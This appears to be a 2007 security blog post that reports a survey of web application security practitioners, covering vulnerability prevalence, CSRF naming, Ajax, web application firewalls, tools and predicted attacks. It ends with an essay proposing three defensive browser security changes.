  • "(I think its bad, and was a great find for 07. Really surprised it wasn't found any sooner)"
6) During your web application vulnerability assessments, how many websites where that DID NOT have at least one relatively severe vulnerability?


a) All or almost all (2%)

b) Most (2%)
c) About half (2%)
d) Some (19%)
e) None or very few (74%)



7) What's your preferred acronym for Cross Site Request Forgery?


a) CSRF (58%)

b) XSRF (19%)
c) Neither, I prefer Session Riding (7%)
d) No preference (16%)



  • "Sea Surf!!!"
  • "We really need to stop using Cross Site for EVERYTHING."
  • "I don't care, though I like to say "sea-surf," I use "XSRF" in documentation because it is more consistent with XSS."
  • "After much gnashing of teeth over this question I had to come down on the side of the term that I believe best describes the attack. Plus, people will never agree on whether to use "C" or "X", so why not eliminate that problem? (fwiw, I prefer XSRF over CSRF just so it's consistent with XSS)"
  • "...how about one click attack?"
8) Does using Ajax technology open up new website attacks?

a) Yes (9%)

b) Yes, it adds some new things (35%)
c) No, but it increases the attacks surface (40%)
d) Nothing new here, move along (5%)
e) Other (9%)
No Answer (2%)


  • "Sorta. It makes developers more prone to make mistakes while the "attack surface" isn't really that much bigger the likleyhood of some of the same or old issues is greater. For example i find that AJAX developers have i higher tendency to use client side validation only. Not making the realization that AJAX is just like form submission just with a slicker front end. A POST is a POST people!"
  • "People extending their website to use AJAX does provide new potential entry points, I don't see how anyone can deny that. But using AJAX to create a complex attack could be done without AJAX using images to create GET requests and iframes to create POST requests."
  • "It's something that would otherwise be done server-side by PHP/ASP and thus closed source - so developers lose their security through obscurity."
  • "I think it will eventually, possibly as applications provide more features in order be used offline and with caching features. Innovation in this area (and thus new forms of attacks) are mainly coming from startups and non-enterprise companies, most of who do not have a process or funds for proper web application testing."
  • "It can increase the attack surface, but more importantly, Ajax technologies are being used to create better exploits. Focusing on whether using Ajax technologies creates new vulnerabilities is causing many people to look the wrong way when crossing the road."
  • "Adds more attack surface, and doesn't give you any new vuln types, but it does expose more general application logic/architecture nuances which an attacker could use to better infer inner app workings (and thus problem areas)."
9) Your recommendation about using web application firewalls?


a) Two thumbs up (21%)

b) One thumb up (47%)
c) Thumbs down (12%)
d) Profane gesture (9%)
No Answer (5%)


  • "modsecurity has saved me from several stupid bugs in third-party stuff"
  • "Obfuscation rules all firewall/ids. They sure do make alot of money for vendors tho. Spend it on secure software practices and training instead."
  • "I think it can add a layer of defense, but certainly does not fix the problem in our testing."
  • "In any for-profit business, it certainly makes financial sense to use them. The depth of defense they add far outweighs the setup cost and power usage."
  • "Most seem to be best used only as a learning tool to help you find how they can be improved and/or how your skills at detecting such attacks can happen and how you can prevent them from happening before turning to a firewall for protection."
  • "for now they are not so useful. During my security audits I developed some hacker methods to evade webapp firewalls (mod_security in particular) and I plan to write an article about it. They need to be improved."
  • "oh look this IDS will protect me against 0hday, oh shit wait we've just lost our file server due to RPC what?"
  • "I'm some what neutral on this. I think they can add to a defense in depth posture, but in most cases, time and resources are better spent going back up to the application level and training developers on how to write secure code, or by performing code reviews and blackbox testing. I may recommend these more as they become more advance and mature, but my experience is that they are not yet the best way to spend your resources."
  • "Up what? ;)"
  • "Unfortunately, many tend to assume WAF can fix bad code, but they cannot. Also, many think WAF alone are a sufficient counter measure to vulnerable and badly designed web applications, and they are not."
10) How would describe the current state of web browser security?


a) Rock solid (2%)

b) Could be better (51%)
c) Swiss cheese, fix it! (44%)
No Answer (2%)



  • "While browsers facilitate some web based attacks they really aren't to blame for a bunch of things. App developers should be responsible for their own work and not rely on browsers for their security. Anytime you "outsource" your security model is just asking for trouble."
  • "is there even any cheese left anymore? all i see is holes.."
  • "browsers are the least secure, most dangerous software we use, due primarily to the execution of "content-controlled" code. It will be a "big deal" for computer security as a whole if we manage to secure this platform."
  • "Things are in a pretty bad and scary state. "the browser is the operating system" so maybe there's no way to avoid it, but the frequency and number of vulnerabilities should be much lower for such a critical piece of software."
  • "The amount of functionality the average user expects of its web browser has increased remarkably along the past years. As a result, vendors made it more easy to extend the functionality of their products by use of third party software. Unfortunately, most of these have never been sufficiently reviewed from a security perspective. And, being vulnerable to security issues which have been long fixed in the core products, they reintroduce just these and taint the security level of the entire product. As long as plugins and widespread extensions reintroduce vulnerabilities into the commonly used web browsers, and they are widely used, the security of plain web browsers do not matter much."
11) Name your Top 3 web application security resources.
(Listed in order of popularity)
RSnake's Blog
OWASP
Jeremiah Grossman's Blog
The Web Security Mailing List
sla.ckers.org forum
Web Application Security Consortium
Security Focus Web Application Security List
GNUCITIZEN
cgisecuritySecurity Focus
Hacking Exposed Web Applications, 2nd Edition (Joel Scambray, Mike Shema, Caleb Sima)
Full Disclosure
Google
BugTraq
XSS (Cross Site Scripting) Cheat Sheet
SecuniaSylvan von Stuppe
BlackHat
Schneier on Security
PaulDotCom
Professional Pen Testing for Web Applications (Andres Andreu)
del.icio.us (webapp security)
FrSIRT
IEEE S&P
OSSTMM
(IN)SECURE Magazine
Software Security (Gary McGraw)
19 Deadly Sins of Software Security -(Michael Howard, David LeBlanc, John Viega)
SecuriTeam
qasec
WhiteHat Security
http://www.security.nnov.ru
Web Security Threat Classification
http://www.securityfocus.com/archive/107
How to Break Web Software (Mike Andrews, James A. Whittaker)
Microsoft
Security Focus Penetration Testing
SearchAppSecurity
National Vulnerability Database
ComputerWorld
Safari Bookshelf

12) What are your Top 3 tools to find vulnerabilities in websites? (NO BROWSERS!)
(Listed in order of popularity)
  • Paros
  • Burp Suite
  • By Hand / My Brain
  • Proprietary Tools
  • Nikto
  • WebScarab
  • Web Developer Toolbar
  • WebInspect / SPI Proxy
  • Tamper Data
  • CLI-based HTTP tools (wget, curl, netcat, lynx, links, elinks, LWP, etc)
  • Fiddler
  • Watchfire AppScan
  • Firebug
  • Nessus
  • RSnake's XSS Cheat Sheet
  • Watchfire HTTP Proxy
  • Achilles
  • nmap
  • Grabber
  • Acunetix
  • XSS Assistant
  • Live HTTP Headers
  • Ruby
  • Fierce
  • RFuzz
  • CAL9000
  • HTMangLe
  • Cenzic Hailstorm
  • Sensepost Crowbar
  • ISS
  • Wireshark
  • AnEC
  • Ethereal
  • Perl
  • Wikto
13) What are the Top 3 types of website attacks we're most likely to see a lot more of in 2007?
(Listed in order of popularity)
  • Cross-Site Scripting
  • Cross-Site Requests Forgery
  • Web Worms
  • XSS-Phishing (Phishing w/ Superbait)
  • SQL Injection
  • Web Services / XML Injection
  • Ajax-based Attacks
  • Logical Flaws
  • UXSS
  • Unknown Issues
  • Denial of Service
  • PHP Includes
  • Browser Plug-in / Extension Hacking
  • Exponential XSS
  • Backdooring Media Files
  • "chrome" attacks
  • internationalization and charsets
  • Privilege Escalation
  • Authentication attacks
  • Session Hi-Jacking
  • Mobile Code (Flash/Java)
  • Configuration issues
14) What was your information security New Year's resolution?
  • Less projects, more quality
  • To spend more time with my wife and less time thinking about security.
  • Finding vulnerabilities in FireFox
  • Start own research in a particular web app sec area.
  • Get a job doing WAVA full-time (no other hats or VA work)
  • 1024x768 ;-)
  • Learn to demonstrate exploits.
  • To say important things. If developers don't listen, it's the fault of WSJ for not defiling enough companies.
  • Start working in a security company?
  • White-list sites with JavaScript execution permissions
  • Blog more. (is that infosec related? Blogging on infosec topics...)
  • Become more involved (less of a lurker) in the web app security area.
  • More champaign while doing assessments!
  • Dang, go to defcon, toorcon again. Do more R + D, do some posting to the lists (I never do historically).
  • Continiue the learning process.
  • Keep the OWASP Kansas City chapter active and involved.
  • Be better than I was last year.
  • http://www.cgisecurity.com/2006/12/07
  • CISSP Certification?
  • To give back to the field more than i extract. i.e. to come up with new ideas or improve upon existing ones more than i learn from others' research.
  • I didn't make one. I slept through New years as well.
  • Not to make any more resolutions
  • Research more.
  • The last year was very interesting in security field and the new 2007 year
  • will be also interesting and hot. There are very small amount of site which
  • were security audit and every day new sites appear. So there are a lot of
  • sites to look at their security
  • Finally understand that after doing this since 1998, clients won't learn, it won't save the world and getting old makes you more cynical
  • All your web 2.0 are belong to us ;)
  • Locate at least one huge issue that wakes up the browser community out of their web application security slumber.
  • Work to bring more education, awareness, and training to more developers
  • and a wider audience than our standard security community.
  • never do blacklisting, white listing save life
  • Educate developers
  • Be up to date and do more research.
  • Build more tools and share knowledge - have fun :)
  • Get better
  • Get certified (QDSP, QPASP)
  • I will not get 0wn3d.
  • The booze.
15) What's the first thing you have or plan to learn/research/try/code/write in 2007?
  • XSS/CSRF combo attacks
  • Adding embedded Ruby support to a popular hex editor to make it the Emacs of reverse engineering.
  • Universal XSS Worm, but only as a PoC and personal information gain.
  • SANS course in forensics.
  • Attend my local OWASP meeting
  • Convince my Bose to provide more training
  • A better web goat bank than web goat bank,
  • Hopefully, a JavaScript functional analyzer?
  • Soon to be released to the public ...
  • Wish I could -- no time. Will be busy doing nothing but risk assessments on campus. Know the techniques and technologies, but I don't spent enough day-to-day doing them so I need to get more hands-on time which I should be getting.
  • Researching possible vulnerabilities within the .NET Framework.
  • Wrote an exploit for the UPDFXSS to scare the crap outta some execs. FUD is good for my paycheck!
  • Neato stuff, I prefer to keep it a secret. I'll just say it has to do with automated attacks.
  • Learn security weaknesses of web services and SOA architecture.
  • .net framework 3.0 object model weaknesses
  • Either a game server in PHP (not real time obviously) or a CMS built from the ground up with security and extensibility in mind.
  • UIML's and fuzzers
  • CISSP Certification and study up on IPS/IDS
  • Intranet hacking using Google Desktop Search
  • I plan learn more about buffer overflows and test for them as well as finding more ways to improve basic application errors and tactics for doing so. I will focus more on stand alone applications and less on webapp security maybe too but it all depends on
  • Complete a VMWare lab for Web Application testing
  • New trojan horse techniques.
  • For some time already I am planning to write my own security scanner (with unique features and functionality). And I plan to developed also web version (online web security scanner), and maybe just single web version.
  • I'm retiring and leaving security :0)
  • Play with XSS
  • Working on my webapp risk metrics and some other paperwork stuff in this field.
  • I've been thinking about interesting ways to do active detection and filtering of malicious traffic.
  • Working on ways to alert, help, and guide Ruby on Rails developers to write secure code.
  • too many to list,....how abt inventing new way to prevent webapps ... something like integration of code review and webapp firewall.
  • anti-dns pinning
  • Threat modeling
  • I want to code some assessment tool for firefox in xul.
  • Utility to crawl Ajax driven applications, seems interesting.
  • DNS pinning
  • Putting (ASP).NET under the microscope.
  • Not sure, I'll tell you when it's done.

3 Wishes for Web Browser Security

Web browser security is broken. Completely shattered.

Take the Top 10 Web Hacks of 2006 and the 60 more that follow to see what I mean. XSS, CSRF, and other attacks make it so bad we can’t be certain we’re the ones driving our browsers. Short of completely reinventing HTTP/HTML/JavaScript/Cookies and other fundamental Web technologies (not going to happen) there are a few things we can do. People will get infected with JavaScript Malware, but there’s no reason why we can’t limit the damage without impacting the user experience.

Here are 3 web browser security enhancements I’d like to see. The sooner the better.

1) Restrict websites with public IP’s from including content from websites with non-routable IP address (RFC 1918)

This restriction is designed to protect against Hacking Intranet Websites from the Outside (Port Scanning, Fingerprinting, etc.). If JavaScript Malware can’t force a browser to make non-routable IP requests, then there’s not much left it can do whether or not if it has your private IP. I can’t think of any good reason that a website with a public IP would legitimately need to include data from a private IP.

2) Browser integration of Secure Cache, Safe History, and Netcraft’s anti-XSS URL features in their toolbar

The name says it all. There are excellent extensions and provide a good amount of security that all users can benefit by. Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell from Stanford and the guys from Netcraft did a great job. I don’t know what Mozilla’s policy is on this kind of thing, but this is one they should definitely consider building in by default. Another feature I’d like to see is restriction of any non-alphanumeric character in the fragment portion of the URL. Designed to stop DOM-based XSS and UXSS.

3) Same-origin policy applied to the JavaScript Error Console
JavaScript errors from code located on DomainA should not be readable from DomainB. This enhancement is design to protect again the Login/History Detection Hack. So when SCRIPT SRCing in a page from another domain (Gmail, Yahoo Mail, MSN, etc.), hoping to get a signature match, you’d be out of luck because you can’t see the error message. This might hinder debugging in some cases, but not much I don’t think.

Bonus

Content-Restrictions. Are we there yet?